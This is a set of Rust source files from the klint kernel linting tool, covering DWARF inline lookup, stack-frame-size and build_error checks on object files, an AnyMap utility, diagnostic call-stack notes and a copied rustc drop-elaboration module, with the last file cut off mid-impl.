let mut stack = Vec::new();
let mut entries = unit.entries();
while let Some((depth, die)) = entries.next_dfs()? {
for _ in depth..=0 {
stack.pop();
}
if matches!(
die.tag(),
gimli::DW_TAG_subprogram | gimli::DW_TAG_inlined_subroutine
) {
stack.push(Some(self.linkage_name(&unit, die)?));
} else {
stack.push(None);
}
if die.tag() != gimli::DW_TAG_inlined_subroutine {
continue;
}
let ranges = self.ranges(&unit, die)?;
if ranges.0 != section_index {
continue;
}
if ranges
.1
.iter()
.any(|range| range.contains(&(offset as i64)))
{
let callee = stack.last().unwrap().as_ref().unwrap();
let caller = stack
.iter()
.rev()
.skip(1)
.find(|x| x.is_some())
.and_then(|x| x.as_ref())
.ok_or(Error::UnexpectedDwarf(
"DW_TAG_inlined_subroutine is not nested inside DW_TAG_subprogram",
))?;
// Call stack must form a chain.
if let Some(last_call) = callstack.last() {
if last_call.callee != *caller {
Err(Error::UnexpectedDwarf("Inlined call does not form a chain"))?
}
}
let location = self.call_location(&unit, die)?;
callstack.push(Call {
caller: caller.clone(),
callee: callee.clone(),
location,
});
}
}
}
Ok(callstack)
}
fn file_name(
&self,
unit: &Unit<ReaderTy<'_>>,
line: &LineProgramHeader<ReaderTy<'_>>,
index: u64,
) -> Result<PathBuf, Error> {
let file = line.file(index).ok_or(Error::UnexpectedDwarf(
"debug_lines referenced non-existent file",
))?;
let mut path = PathBuf::new();
if file.directory_index() != 0 {
let directory = file.directory(line).ok_or(Error::UnexpectedDwarf(
"debug_lines referenced non-existent directory",
))?;
path.push(self.dwarf().attr_string(unit, directory)?.to_string()?);
}
path.push(
self.dwarf()
.attr_string(unit, file.path_name())?
.to_string()?,
);
Ok(path)
}
pub fn locate<'tcx>(
&self,
section_index: SectionIndex,
offset: u64,
) -> Result<Option<Location>, Error> {
// FIXME: should this be optimized?
let mut iter = self.dwarf.units();
while let Some(header) = iter.next()? {
let mut unit = self.dwarf.unit(header)?;
let mut prev: Option<(_, LineRow)> = None;
if let Some(ilnp) = unit.line_program.take() {
let mut rows = ilnp.rows();
while let Some((_, row)) = rows.next_row()? {
let row = *row;
let encoded_address = row.address();
let (encoded_section, encoded_offset) =
self.section_layout.decode(encoded_address)?;
// Skip over sections that we don't care about.
if encoded_section != section_index {
continue;
}
if let Some((prev_addr, prev_row)) = prev
&& prev_row.line().is_some()
&& (prev_addr..encoded_offset).contains(&(offset as i64))
{
let file = self.file_name(&unit, rows.header(), prev_row.file_index())?;
let line = prev_row.line().map_or(0, NonZero::get);
let column = match prev_row.column() {
gimli::ColumnType::LeftEdge => 0,
gimli::ColumnType::Column(v) => v.get(),
};
return Ok(Some(Location { file, line, column }));
}
if row.end_sequence() {
prev = None;
} else {
prev = Some((encoded_offset, row));
}
}
}
}
Ok(None)
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/stack_size.rs | src/binary_analysis/stack_size.rs | use iced_x86::{Decoder, DecoderOptions, Mnemonic, OpKind, Register};
use object::{Architecture, File, Object, ObjectSection, SectionKind};
use rustc_data_structures::fx::FxHashSet;
use rustc_errors::{Diag, Diagnostic, Level};
use rustc_hir::CRATE_HIR_ID;
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::Instance;
use rustc_session::declare_tool_lint;
use rustc_span::{Span, Symbol, sym};
use crate::ctxt::AnalysisCtxt;
declare_tool_lint! {
//// The `stack_frame_too_large` lint detects large stack frames that may potentially
/// lead to stack overflow.
pub klint::STACK_FRAME_TOO_LARGE,
Allow,
"frame size is too large"
}
#[derive(Diagnostic)]
#[diag(klint_stack_frame_limit_missing)]
#[help(klint_stack_frame_limit_help)]
struct StackFrameLimitMissing {
#[primary_span]
pub span: Span,
pub default: u32,
}
#[derive(Diagnostic)]
#[diag(klint_stack_frame_limit_invalid)]
#[help(klint_stack_frame_limit_help)]
struct StackFrameLimitInvalid {
#[primary_span]
pub span: Span,
pub setting: Symbol,
}
#[derive(Diagnostic)]
#[diag(klint_stack_frame_too_large)]
#[note]
struct StackFrameTooLarge<'a, 'tcx> {
pub section: &'a str,
pub offset: u64,
pub insn: String,
pub stack_size: u64,
pub frame_limit: u64,
#[primary_span]
pub span: Span,
pub instance: Instance<'tcx>,
}
pub fn stack_size_check<'tcx, 'obj>(cx: &AnalysisCtxt<'tcx>, file: &File<'obj>) {
let lint_cfg = cx.lint_level_at_node(STACK_FRAME_TOO_LARGE, CRATE_HIR_ID);
// Given inlining and cross-crate monomorphization happening, it does not make
// a lot of sense to define this lint on anywhere except codegen unit level. So
// just take levels from the crate root.
let level = match lint_cfg.level {
// Don't run any of the checks if the lint is allowed.
// This is one of the more expensive checks.
//
// NOTE: `expect` is actually not supported as this check is too late.
// But we need to match it so treat like `allow` anyway.
rustc_lint::Level::Allow | rustc_lint::Level::Expect => return,
rustc_lint::Level::Warn => Level::Warning,
rustc_lint::Level::ForceWarn => Level::ForceWarning,
rustc_lint::Level::Deny | rustc_lint::Level::Forbid => Level::Error,
};
// Obtain the stack size limit.
// Ideally we support `#![klint::stack_frame_size_limit = 4096]`, but this is not yet stable
// (custom_inner_attributes).
// Instead, we find via `CONFIG_FRAME_WARN` cfg.
let frame_limit_sym = cx
.sess
.psess
.config
.iter()
.copied()
.find(|&(k, v)| k == crate::symbol::CONFIG_FRAME_WARN && v.is_some())
.map(|(_, v)| v.unwrap())
.unwrap_or(sym::empty);
let frame_limit = if frame_limit_sym.is_empty() {
cx.dcx().emit_warn(StackFrameLimitMissing {
span: lint_cfg.src.span(),
default: 2048,
});
2048
} else if let Ok(v) = frame_limit_sym.as_str().parse() {
v
} else {
cx.dcx().emit_err(StackFrameLimitInvalid {
span: lint_cfg.src.span(),
setting: frame_limit_sym,
});
return;
};
// Currently only x64 is supported for this lint.
if file.architecture() != Architecture::X86_64 {
return;
}
for section in file.sections() {
// Only check text sections.
if !matches!(section.kind(), SectionKind::Text) {
continue;
}
let data = section.uncompressed_data().unwrap();
let decoder = Decoder::with_ip(64, &data, 0, DecoderOptions::NONE);
let mut linted = FxHashSet::default();
for insn in decoder {
if insn.mnemonic() == Mnemonic::Sub
&& insn.op0_kind() == OpKind::Register
&& insn.op0_register() == Register::RSP
&& let Ok(stack_size) = insn.try_immediate(1)
{
if stack_size < frame_limit {
continue;
}
let offset = insn.ip();
let Some((symbol, _)) =
super::find_symbol_from_section_offset(file, §ion, offset)
else {
continue;
};
let Some(MonoItem::Fn(instance)) = cx.symbol_name_to_mono(symbol) else {
continue;
};
if !linted.insert(instance) {
continue;
}
let diag: Diag<'_, ()> = StackFrameTooLarge {
section: section.name().unwrap(),
offset,
insn: insn.to_string(),
stack_size,
frame_limit,
span: cx.def_span(instance.def_id()),
instance,
}
.into_diag(cx.dcx(), level);
diag.emit();
}
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/build_error.rs | src/binary_analysis/build_error.rs | use object::{File, Object, ObjectSection, ObjectSymbol, RelocationTarget};
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::{Instance, TypingEnv};
use rustc_span::Span;
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::use_stack::{UseSite, UseSiteKind};
#[derive(Diagnostic)]
#[diag(klint_build_error_referenced_without_symbol)]
struct BuildErrorReferencedWithoutSymbol;
#[derive(Diagnostic)]
#[diag(klint_build_error_referenced_without_instance)]
struct BuildErrorReferencedWithoutInstance<'a> {
pub symbol: &'a str,
}
#[derive(Diagnostic)]
#[diag(klint_build_error_referenced_without_debug)]
#[note]
struct BuildErrorReferencedWithoutDebug<'tcx> {
#[primary_span]
pub span: Span,
pub kind: &'static str,
pub instance: Instance<'tcx>,
pub err: String,
}
#[derive(Diagnostic)]
#[diag(klint_build_error_referenced)]
struct BuildErrorReferenced;
pub fn build_error_detection<'tcx, 'obj>(cx: &AnalysisCtxt<'tcx>, file: &File<'obj>) {
let Some(build_error) = cx.get_klint_diagnostic_item(crate::symbol::build_error) else {
return;
};
let build_error_symbol_name = cx.symbol_name(Instance::mono(cx.tcx, build_error)).name;
let Some(build_error_symbol) = file.symbol_by_name(build_error_symbol_name) else {
// This object file contains no reference to `build_error`, all good!
return;
};
// This object file defines this symbol; in which case we're codegenning for `build_error` crate.
// Nothing to do.
if !build_error_symbol.is_undefined() {
return;
}
let relo_target_needle = RelocationTarget::Symbol(build_error_symbol.index());
// Now this file contains reference to `build_error`, this is not expected.
// We need to figure out why it is being generated.
for section in file.sections() {
for (offset, relocation) in section.relocations() {
if relocation.target() == relo_target_needle {
// Found a relocation that points to `build_error`. Emit an error.
let Some((symbol, _)) =
super::find_symbol_from_section_offset(file, §ion, offset)
else {
cx.dcx().emit_err(BuildErrorReferencedWithoutSymbol);
continue;
};
let Some(mono) = cx.symbol_name_to_mono(symbol) else {
cx.dcx()
.emit_err(BuildErrorReferencedWithoutInstance { symbol });
continue;
};
let loader = super::dwarf::DwarfLoader::new(file)
.expect("DWARF loader creation should not fail");
let mut diag = cx.dcx().create_err(BuildErrorReferenced);
let mut frame = match mono {
MonoItem::Fn(instance) => instance,
MonoItem::Static(def_id) => Instance::mono(cx.tcx, def_id),
MonoItem::GlobalAsm(_) => bug!(),
};
let mut recovered_call_stack = Vec::new();
let result: Result<_, super::dwarf::Error> = try {
let call_stack = loader.inline_info(section.index(), offset)?;
if let Some(first) = call_stack.first() {
if first.caller != symbol {
Err(super::dwarf::Error::UnexpectedDwarf(
"root of call stack is unexpected",
))?
}
}
for call in call_stack {
if let Some((callee, site)) = super::reconstruct::recover_fn_call_span(
cx.tcx,
frame,
&call.callee,
call.location.as_ref(),
) {
recovered_call_stack.push(UseSite {
instance: TypingEnv::fully_monomorphized().as_query_input(frame),
kind: site,
});
frame = callee;
}
}
};
if let Err(err) = result {
diag.note(format!(
"attempt to reconstruct inline information from DWARF failed: {err}"
));
}
let result: Result<_, super::dwarf::Error> = try {
let loc = loader.locate(section.index(), offset)?.ok_or(
super::dwarf::Error::UnexpectedDwarf("cannot find line number info"),
)?;
if let Some((_, site)) = super::reconstruct::recover_fn_call_span(
cx.tcx,
frame,
build_error_symbol_name,
Some(&loc),
) {
recovered_call_stack.push(UseSite {
instance: TypingEnv::fully_monomorphized().as_query_input(frame),
kind: site,
});
} else {
let span = super::reconstruct::recover_span_from_line_no(cx.tcx, &loc)
.ok_or(super::dwarf::Error::Other(
"cannot find file in compiler session",
))?;
recovered_call_stack.push(UseSite {
instance: TypingEnv::fully_monomorphized().as_query_input(frame),
kind: UseSiteKind::Other(
span,
"which is referenced by this function".to_string(),
),
})
}
};
if let Err(err) = result {
diag.cancel();
// If even line number cannot be recovered, emit a different diagnostic.
cx.dcx().emit_err(match mono {
MonoItem::Fn(instance) => BuildErrorReferencedWithoutDebug {
span: cx.def_span(instance.def_id()),
kind: "fn",
instance,
err: err.to_string(),
},
MonoItem::Static(def_id) => BuildErrorReferencedWithoutDebug {
span: cx.def_span(def_id),
kind: "static",
instance: Instance::mono(cx.tcx, def_id),
err: err.to_string(),
},
MonoItem::GlobalAsm(_) => {
// We're not going to be covered by symbols inside global asm.
bug!();
}
});
continue;
}
cx.note_use_stack(&mut diag, &recovered_call_stack);
diag.span_note(
cx.def_span(mono.def_id()),
format!("reference contained in `{}`", mono),
);
diag.emit();
}
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/mod.rs | src/binary_analysis/mod.rs | use std::fs::File;
use std::path::Path;
use object::{File as ObjectFile, Object, ObjectSection, ObjectSymbol, Section, SymbolSection};
use crate::ctxt::AnalysisCtxt;
mod build_error;
mod dwarf;
mod reconstruct;
pub(crate) mod stack_size;
pub fn binary_analysis<'tcx>(cx: &AnalysisCtxt<'tcx>, path: &Path) {
let file = File::open(path).unwrap();
let mmap = unsafe { rustc_data_structures::memmap::Mmap::map(file) }.unwrap();
let object = ObjectFile::parse(&*mmap).unwrap();
build_error::build_error_detection(cx, &object);
stack_size::stack_size_check(cx, &object);
}
fn find_symbol_from_section_offset<'obj>(
file: &ObjectFile<'obj>,
section: &Section<'_, 'obj>,
offset: u64,
) -> Option<(&'obj str, u64)> {
let section_needle = SymbolSection::Section(section.index());
for sym in file.symbols() {
if sym.section() != section_needle {
continue;
}
let start = sym.address();
let end = start + sym.size();
if (start..end).contains(&offset) {
if let Ok(name) = sym.name() {
return Some((name, offset - start));
}
}
}
None
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/utils/anymap.rs | src/utils/anymap.rs | use std::any::{Any, TypeId};
use std::collections::hash_map as map;
use std::marker::{PhantomData, Unsize};
use rustc_data_structures::fx::FxHashMap;
/// Map that can store data for arbitrary types.
pub struct AnyMap<U: ?Sized> {
    // This is basically `FxHashMap<TypeId, Box<dyn Any>>`
    //
    // The generic `U` is present to capture auto trait bounds.
    //
    // Invariant: the boxed value stored under `TypeId::of::<T>()` is always a
    // `T` (unsized to `U`); the `unsafe` downcasts in the entry types rely on
    // this.
    map: FxHashMap<TypeId, Box<U>>,
}
/// View into an occupied entry of an `AnyMap`; the stored value was inserted
/// as a `T`.
pub struct OccupiedEntry<'a, U: ?Sized, T> {
    entry: map::OccupiedEntry<'a, TypeId, Box<U>>,
    // Records which concrete type this entry was obtained for.
    phantom: PhantomData<T>,
}
impl<'a, U: Any + ?Sized + 'static, T: 'static> OccupiedEntry<'a, U, T> {
    /// Converts the entry into a mutable reference to the stored `T`, with a
    /// lifetime bound to the map itself.
    pub fn into_mut(self) -> &'a mut T
    where
        T: Unsize<U>,
    {
        let any_ref = &mut **self.entry.into_mut();
        // The map only ever stores a `T` under `TypeId::of::<T>()`.
        debug_assert_eq!((*any_ref).type_id(), TypeId::of::<T>());
        // SAFETY: by type invariant, `any_ref` is a `&mut T`.
        unsafe { &mut *(any_ref as *mut U as *mut T) }
    }
}
/// View into a vacant entry of an `AnyMap`, keyed by type `T`.
pub struct VacantEntry<'a, U: ?Sized, T> {
    entry: map::VacantEntry<'a, TypeId, Box<U>>,
    // Records which concrete type this entry was obtained for.
    phantom: PhantomData<T>,
}
impl<'a, U: Any + ?Sized, T> VacantEntry<'a, U, T> {
    /// Inserts `value` into the map and returns a mutable reference to it,
    /// with a lifetime bound to the map itself.
    pub fn insert(self, value: T) -> &'a mut T
    where
        T: Unsize<U>,
    {
        let any_ref = &mut **self.entry.insert(Box::new(value) as _);
        // SAFETY: we just inserted it and we know the type is `Box<T>`.
        unsafe { &mut *(any_ref as *mut U as *mut T) }
    }
}
/// A view into a single entry of an `AnyMap`, which may be either occupied or
/// vacant.
pub enum Entry<'a, U: ?Sized, T> {
    Occupied(OccupiedEntry<'a, U, T>),
    Vacant(VacantEntry<'a, U, T>),
}
impl<'a, U: Any + ?Sized, T: 'static> Entry<'a, U, T> {
    /// Returns a mutable reference to the stored `T`, inserting the value
    /// produced by `default` if the entry is vacant.
    pub fn or_insert_with<F: FnOnce() -> T>(self, default: F) -> &'a mut T
    where
        T: Unsize<U>,
    {
        match self {
            Entry::Occupied(entry) => entry.into_mut(),
            Entry::Vacant(entry) => entry.insert(default()),
        }
    }
}
impl<U: ?Sized> Default for AnyMap<U> {
    /// Equivalent to `AnyMap::new`.
    fn default() -> Self {
        Self::new()
    }
}
impl<U: ?Sized> AnyMap<U> {
    /// Creates an empty map.
    pub fn new() -> Self {
        Self {
            map: Default::default(),
        }
    }
}
impl<U: Any + ?Sized> AnyMap<U> {
    /// Gets the entry keyed by type `T`, for in-place lookup or insertion.
    ///
    /// Only ever inserting under `TypeId::of::<T>()` (via the returned entry)
    /// is what keeps the value stored under that key a `T`.
    pub fn entry<T: 'static>(&mut self) -> Entry<'_, U, T> {
        match self.map.entry(TypeId::of::<T>()) {
            map::Entry::Occupied(entry) => Entry::Occupied(OccupiedEntry {
                entry,
                phantom: PhantomData,
            }),
            map::Entry::Vacant(entry) => Entry::Vacant(VacantEntry {
                entry,
                phantom: PhantomData,
            }),
        }
    }
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/utils/mod.rs | src/utils/mod.rs | pub mod anymap;
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/diagnostic/mod.rs | src/diagnostic/mod.rs | pub(crate) mod use_stack;
use rustc_middle::ty::PseudoCanonicalInput;
pub struct PolyDisplay<'a, 'tcx, T>(pub &'a PseudoCanonicalInput<'tcx, T>);
impl<T> std::fmt::Display for PolyDisplay<'_, '_, T>
where
    T: std::fmt::Display + Copy,
{
    /// Writes the wrapped value, followed by a `where` clause listing the
    /// caller bounds (comma-separated) if there are any.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        let PseudoCanonicalInput { typing_env, value } = self.0;
        write!(f, "{value}")?;

        let bounds = typing_env.param_env.caller_bounds();
        if !bounds.is_empty() {
            write!(f, " where ")?;
            let mut sep = "";
            for predicate in bounds.iter() {
                write!(f, "{sep}{predicate}")?;
                sep = ", ";
            }
        }
        Ok(())
    }
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/diagnostic/use_stack.rs | src/diagnostic/use_stack.rs | //! Utility for generating diagnostic information that involves chains.
//!
//! For example, when giving context about why a specific instance is used, a call stack (or rather, use stack,
//! as some usage may be due to pointer coercion or static reference).
use rustc_errors::{Diag, EmissionGuarantee, MultiSpan};
use rustc_hir::LangItem;
use rustc_hir::def_id::DefId;
use rustc_middle::ty::{GenericArgs, Instance, PseudoCanonicalInput, TypingEnv};
use rustc_span::{Span, sym};
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::PolyDisplay;
/// The reason an instance is considered "used" at a particular site.
#[derive(Debug)]
pub enum UseSiteKind {
    /// Used due to a direct function call.
    Call(Span),
    /// Used due to a variable drop.
    Drop {
        /// Span that causes the drop.
        drop_span: Span,
        /// Span of the place being dropped.
        place_span: Span,
    },
    /// A function is used when it is coerced into a function pointer.
    PointerCoercion(Span),
    /// A function is used as it is a trait method and the trait vtable is constructed.
    Vtable(Span),
    /// Some other type of usage; the string is the diagnostic note emitted
    /// for this site.
    Other(Span, String),
}
impl UseSiteKind {
    /// The primary span of this use site (for drops, the span that triggers
    /// the drop).
    pub fn span(&self) -> Span {
        match *self {
            UseSiteKind::Call(span)
            | UseSiteKind::PointerCoercion(span)
            | UseSiteKind::Vtable(span)
            | UseSiteKind::Other(span, _) => span,
            UseSiteKind::Drop { drop_span, .. } => drop_span,
        }
    }

    /// Like [`Self::span`], but for drops additionally labels the place being
    /// dropped.
    pub fn multispan(&self) -> MultiSpan {
        if let UseSiteKind::Drop {
            drop_span,
            place_span,
        } = self
        {
            let mut spans = MultiSpan::from_span(*drop_span);
            spans.push_span_label(*place_span, "value being dropped is here");
            spans
        } else {
            MultiSpan::from_span(self.span())
        }
    }
}
#[derive(Debug)]
pub struct UseSite<'tcx> {
    /// The instance that makes the use.
    pub instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
    /// The specific use that occurred in the instance.
    pub kind: UseSiteKind,
}
impl<'tcx> AnalysisCtxt<'tcx> {
    /// Obtain the polymorphic instance of `def_id`.
    fn poly_instance_of_def_id(&self, def_id: DefId) -> PseudoCanonicalInput<'tcx, Instance<'tcx>> {
        let poly_typing_env = TypingEnv::post_analysis(self.tcx, def_id);
        let poly_args =
            self.erase_and_anonymize_regions(GenericArgs::identity_for_item(self.tcx, def_id));
        poly_typing_env.as_query_input(Instance::new_raw(def_id, poly_args))
    }

    /// Determine if the instance is fully polymorphic, or if it is already specialized.
    fn is_fully_polymorphic(&self, instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>) -> bool {
        self.poly_instance_of_def_id(instance.value.def_id()) == instance
    }

    /// Attaches a note to `diag` for each step of `use_stack`, outermost use
    /// last, e.g. "which is called from here".
    ///
    /// If `diag` has no primary span yet, the first (innermost) visible site
    /// becomes the primary span instead of a note. Drop-glue frames are
    /// summarized as a plain note and `mem::drop` frames are hidden entirely.
    pub fn note_use_stack<G: EmissionGuarantee>(
        &self,
        diag: &mut Diag<'tcx, G>,
        use_stack: &[UseSite<'tcx>],
    ) {
        for site in use_stack.iter().rev() {
            let def_id = site.instance.value.def_id();
            if self.is_lang_item(def_id, LangItem::DropInPlace) {
                // `drop_in_place::<T>` has no useful span; report the type instead.
                let ty = site.instance.value.args[0];
                diag.note(format!("which is called from drop glue of `{ty}`"));
                continue;
            }

            // Hide `drop()` call from stack as it's mostly noise.
            if self.is_diagnostic_item(sym::mem_drop, def_id) {
                continue;
            }

            if diag.span.is_dummy() {
                diag.span = site.kind.multispan();
            } else {
                match &site.kind {
                    UseSiteKind::Call(span) => {
                        diag.span_note(*span, "which is called from here");
                    }
                    // `UseSiteKind::multispan` already attaches the
                    // "value being dropped is here" label for drops.
                    UseSiteKind::Drop { .. } => {
                        diag.span_note(site.kind.multispan(), "which is dropped here");
                    }
                    UseSiteKind::PointerCoercion(span) => {
                        diag.span_note(*span, "which is used as a pointer here");
                    }
                    UseSiteKind::Vtable(span) => {
                        diag.span_note(*span, "which is used as a vtable here");
                    }
                    UseSiteKind::Other(span, other) => {
                        diag.span_note(*span, other.clone());
                    }
                }
            }

            if !self.is_fully_polymorphic(site.instance) {
                diag.note(format!("inside instance `{}`", PolyDisplay(&site.instance)));
            }
        }
    }
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/mir/elaborate_drop.rs | src/mir/elaborate_drop.rs | #![allow(dead_code)]
// From rustc_mir_transform/src/elaborate_drop.rs
// Needed because they're `pub(crate)`
use std::{fmt, iter, mem};
use rustc_abi::{FIRST_VARIANT, FieldIdx, VariantIdx};
use rustc_hir::def::DefKind;
use rustc_hir::lang_items::LangItem;
use rustc_index::Idx;
use rustc_middle::mir::*;
use rustc_middle::ty::adjustment::PointerCoercion;
use rustc_middle::ty::util::IntTypeExt;
use rustc_middle::ty::{self, GenericArg, GenericArgsRef, Ty, TyCtxt};
use rustc_middle::{span_bug, traits};
use rustc_span::DUMMY_SP;
use rustc_span::source_map::{Spanned, dummy_spanned};
use tracing::{debug, instrument};
use super::patch::MirPatch;
/// Describes how/if a value should be dropped.
///
/// Returned by [`DropElaborator::drop_style`].
#[derive(Debug)]
pub(crate) enum DropStyle {
    /// The value is already dead at the drop location, no drop will be executed.
    Dead,
    /// The value is known to always be initialized at the drop location, drop will always be
    /// executed.
    Static,
    /// Whether the value needs to be dropped depends on its drop flag.
    Conditional,
    /// An "open" drop is one where only the fields of a value are dropped.
    ///
    /// For example, this happens when moving out of a struct field: The rest of the struct will be
    /// dropped in such an "open" drop. It is also used to generate drop glue for the individual
    /// components of a value, for example for dropping array elements.
    Open,
}
/// Which drop flags to affect/check with an operation.
///
/// Passed to [`DropElaborator::drop_style`] and
/// [`DropElaborator::clear_drop_flag`].
#[derive(Debug)]
pub(crate) enum DropFlagMode {
    /// Only affect the top-level drop flag, not that of any contained fields.
    Shallow,
    /// Affect all nested drop flags in addition to the top-level one.
    Deep,
}
/// Describes if unwinding is necessary and where to unwind to if a panic occurs.
///
/// See [`Unwind::into_action`] for the conversion to a terminator's
/// `UnwindAction`.
#[derive(Copy, Clone, Debug)]
pub(crate) enum Unwind {
    /// Unwind to this block.
    To(BasicBlock),
    /// Already in an unwind path, any panic will cause an abort.
    InCleanup,
}
impl Unwind {
    /// Whether the drop being built is on an unwind (cleanup) path.
    fn is_cleanup(self) -> bool {
        matches!(self, Unwind::InCleanup)
    }

    /// Converts to the `UnwindAction` placed on terminators: unwinding from a
    /// cleanup path aborts instead of unwinding again.
    fn into_action(self) -> UnwindAction {
        match self {
            Unwind::To(bb) => UnwindAction::Cleanup(bb),
            Unwind::InCleanup => UnwindAction::Terminate(UnwindTerminateReason::InCleanup),
        }
    }

    /// Applies `f` to the unwind target block, leaving `InCleanup` untouched.
    fn map<F>(self, f: F) -> Self
    where
        F: FnOnce(BasicBlock) -> BasicBlock,
    {
        if let Unwind::To(bb) = self {
            Unwind::To(f(bb))
        } else {
            Unwind::InCleanup
        }
    }
}
pub(crate) trait DropElaborator<'a, 'tcx>: fmt::Debug {
    /// The type representing paths that can be moved out of.
    ///
    /// Users can move out of individual fields of a struct, such as `a.b.c`. This type is used to
    /// represent such move paths. Sometimes tracking individual move paths is not necessary, in
    /// which case this may be set to (for example) `()`.
    type Path: Copy + fmt::Debug;

    // Accessors

    /// Shared access to the MIR patch being built up.
    fn patch_ref(&self) -> &MirPatch<'tcx>;
    /// Mutable access to the MIR patch being built up.
    fn patch(&mut self) -> &mut MirPatch<'tcx>;
    /// The body whose drops are being elaborated.
    fn body(&self) -> &'a Body<'tcx>;
    /// The type context.
    fn tcx(&self) -> TyCtxt<'tcx>;
    /// Typing environment used for normalization and `needs_drop` queries.
    fn typing_env(&self) -> ty::TypingEnv<'tcx>;
    /// Whether async drops may be emitted for this body.
    fn allow_async_drops(&self) -> bool;

    /// The location of the terminator of block `bb`.
    fn terminator_loc(&self, bb: BasicBlock) -> Location;

    // Drop logic

    /// Returns how `path` should be dropped, given `mode`.
    fn drop_style(&self, path: Self::Path, mode: DropFlagMode) -> DropStyle;

    /// Returns the drop flag of `path` as a MIR `Operand` (or `None` if `path` has no drop flag).
    fn get_drop_flag(&mut self, path: Self::Path) -> Option<Operand<'tcx>>;

    /// Modifies the MIR patch so that the drop flag of `path` (if any) is cleared at `location`.
    ///
    /// If `mode` is deep, drop flags of all child paths should also be cleared by inserting
    /// additional statements.
    fn clear_drop_flag(&mut self, location: Location, path: Self::Path, mode: DropFlagMode);

    // Subpaths

    /// Returns the subpath of a field of `path` (or `None` if there is no dedicated subpath).
    ///
    /// If this returns `None`, `field` will not get a dedicated drop flag.
    fn field_subpath(&self, path: Self::Path, field: FieldIdx) -> Option<Self::Path>;

    /// Returns the subpath of a dereference of `path` (or `None` if there is no dedicated subpath).
    ///
    /// If this returns `None`, `*path` will not get a dedicated drop flag.
    ///
    /// This is only relevant for `Box<T>`, where the contained `T` can be moved out of the box.
    fn deref_subpath(&self, path: Self::Path) -> Option<Self::Path>;

    /// Returns the subpath of downcasting `path` to one of its variants.
    ///
    /// If this returns `None`, the downcast of `path` will not get a dedicated drop flag.
    fn downcast_subpath(&self, path: Self::Path, variant: VariantIdx) -> Option<Self::Path>;

    /// Returns the subpath of indexing a fixed-size array `path`.
    ///
    /// If this returns `None`, elements of `path` will not get a dedicated drop flag.
    ///
    /// This is only relevant for array patterns, which can move out of individual array elements.
    fn array_subpath(&self, path: Self::Path, index: u64, size: u64) -> Option<Self::Path>;
}
/// All state needed to elaborate one drop of `place`.
#[derive(Debug)]
struct DropCtxt<'a, 'b, 'tcx, D>
where
    D: DropElaborator<'b, 'tcx>,
{
    elaborator: &'a mut D,

    /// Source info attached to every statement/terminator this context emits.
    source_info: SourceInfo,

    /// The place being dropped.
    place: Place<'tcx>,
    /// Move path of `place`, used to query drop style and drop flags.
    path: D::Path,
    /// Block to continue to after the drop completes.
    succ: BasicBlock,
    /// Where to unwind to if the drop panics.
    unwind: Unwind,
    /// For possible-async drops in coroutines: block to continue to when the
    /// containing coroutine is dropped mid-drop (see `drop_halfladder` docs).
    dropline: Option<BasicBlock>,
}
/// "Elaborates" a drop of `place`/`path` and patches `bb`'s terminator to execute it.
///
/// The passed `elaborator` is used to determine what should happen at the drop terminator. It
/// decides whether the drop can be statically determined or whether it needs a dynamic drop flag,
/// and whether the drop is "open", ie. should be expanded to drop all subfields of the dropped
/// value.
///
/// When this returns, the MIR patch in the `elaborator` contains the necessary changes.
pub(crate) fn elaborate_drop<'b, 'tcx, D>(
    elaborator: &mut D,
    source_info: SourceInfo,
    place: Place<'tcx>,
    path: D::Path,
    succ: BasicBlock,
    unwind: Unwind,
    bb: BasicBlock,
    dropline: Option<BasicBlock>,
) where
    D: DropElaborator<'b, 'tcx>,
    'tcx: 'b,
{
    // Bundle everything into a drop context and let it rewrite `bb`.
    let mut ctxt = DropCtxt {
        elaborator,
        source_info,
        place,
        path,
        succ,
        unwind,
        dropline,
    };
    ctxt.elaborate_drop(bb)
}
impl<'a, 'b, 'tcx, D> DropCtxt<'a, 'b, 'tcx, D>
where
D: DropElaborator<'b, 'tcx>,
'tcx: 'b,
{
